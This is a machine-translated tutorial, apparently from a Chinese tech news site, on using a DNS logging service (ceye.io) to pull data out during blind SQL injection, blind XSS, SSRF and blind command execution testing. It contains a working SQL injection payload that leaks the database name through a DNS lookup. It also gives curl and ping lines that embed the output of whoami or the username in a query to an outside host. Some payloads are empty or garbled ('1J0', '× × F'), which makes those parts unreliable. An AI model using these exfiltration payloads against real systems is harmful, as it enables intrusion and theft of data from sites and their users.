Shulou(Shulou.com)05/31 Report--

How to make rational use of DNSLOG for non-echo security testing, many novices are not very clear about this. In order to help you solve this problem, the following editor will explain it in detail. People with this need can come and learn. I hope you can get something.

When actually testing the security problems of some websites, there is no echo after the execution of some test commands, we can write scripts for blind injection, but some websites will block our ip address, so we can solve it by setting up an ip proxy pool, but the blind injection is often very inefficient, so it produces DNSlog injection.

Before using dnslog, we need to look at the backquotation marks:

Symbol: `

Name: back quotation mark, upper delimiter

Position: backquotation marks, this character is usually in the upper left corner of the keyboard, to the left of the number 1, do not confuse it with single quotation marks

What it does: the string enclosed in backquotes is interpreted by shell as a command line, and when executed, shell first executes the command line and replaces the entire backquote (including two backquotes) with its standard output.

The DNSlog echo test is as follows:

First of all, you need to have a configurable domain name, such as ceye.io, and then set the nameserver of the domain name ceye.io as your server A through the agent, and then configure DNS Server on server A, so that all ceye.io and its subdomain name queries will go to server A, and domain name query requests can be monitored in real time, as shown below.

DNS will leave a log when parsing. This is to read the resolution log of multi-level domain names to get information.

To put it simply, put the information in the advanced domain name, pass it to yourself, and then read the log to get the information.

The principle of this is very abstract, let's take a look at it through a practical example.

Http://ceye.io is a free platform for recording dnslog. After we register, we will go to the control panel and give you a second-level domain name: xxx.ceye.io. When we put the injection information on the third-level domain name, the backend log will be recorded.

0x01SQL blind injection

Take sql blind injection as an example. Take a closer look at the DNSlog injection process:

Blindly note the load_file () function you need to use through DNSlog, so it usually has to be root permission. Show variables like'% secure%'; looks at the disks that load_file () can read.

1. When secure_file_priv is empty, you can read the directory of the disk.

2. When secure_file_priv is G:\, you can read the files of G disk.

3. When secure_file_priv is null,load_file, the file cannot be loaded.

Configure by setting my.ini. Secure_file_priv= "" is a file that can load_flie any disk.

Execute on the mysql command line: select load_file ('\ afanti.xxxx.ceye.io\ aaa'); where afanti is the query statement to be injected

Check the platform and dnsLog is recorded.

The load_file () function can parse the request through dns.

With the fifth level of sql-labs:

Payload:' and if ((select load_file (concat ('\\', (select database ()), '.xxxxx.ceye.io\ abc'), 1J0)-+

Sql statement executed: SELECT * FROM users WHERE id='1' and if ((select load_file (concat ('\\', (select database ()), '.xxxxx.ceye.io\ abc'), 1JE0)

Check the dnslog log and find that the security database has been queried:

0x02 XSS (no echo)

Through blind typing, let the trigger browser access the default link address. If the blind typing is successful, you will receive the following link access record on the platform:

Payload: >

Let src request our dnslog platform

0x03 × × F (no echo)

Payload:

0x04 command execution (no echo)

When a domain name is ping, it will be queried by a recursive DNS. At this time, the query request of DNS can be obtained at the backend. When the command is actually executed and the platform receives the echo, the vulnerability does exist.

Linux

Curl http://.xxx.ceye.io/`whoamipingwhoami`.xxxx.ceye.io

Windows

Ping USERNAME%.xxx.ceye.io

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.